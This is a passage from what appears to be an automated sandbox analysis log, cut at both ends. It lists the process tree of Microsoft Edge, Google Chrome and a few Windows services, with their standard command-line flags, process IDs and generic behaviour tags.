  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:3604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,10306820945554620101,4473241969707980104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
  2⤵
  PID:1532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5f90cc40,0x7ffe5f90cc4c,0x7ffe5f90cc58
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2088 /prefetch:3
  2⤵
  PID:888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2468 /prefetch:8
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3400,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3768,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3720 /prefetch:1
  2⤵
  PID:4484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4944,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:3756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:1000
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff73cd24698,0x7ff73cd246a4,0x7ff73cd246b0
    3⤵
    - Drops file in Program Files directory
    PID:456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5176,i,9205621916860855777,20299771135929212,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4984 /prefetch:1
  2⤵
  PID:4304

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe5fbc46f8,0x7ffe5fbc4708,0x7ffe5fbc4718
  2⤵
  PID:4776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:1996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
  2⤵
  PID:3256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:2708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
  2⤵
  PID:3284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:1
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:5508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4296 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:1
  2⤵
  PID:5800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7916 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1
  2⤵
  PID:5824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8064 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
  2⤵
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8340 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7568 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8128 /prefetch:1
  2⤵
  PID:5900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8072 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8504 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
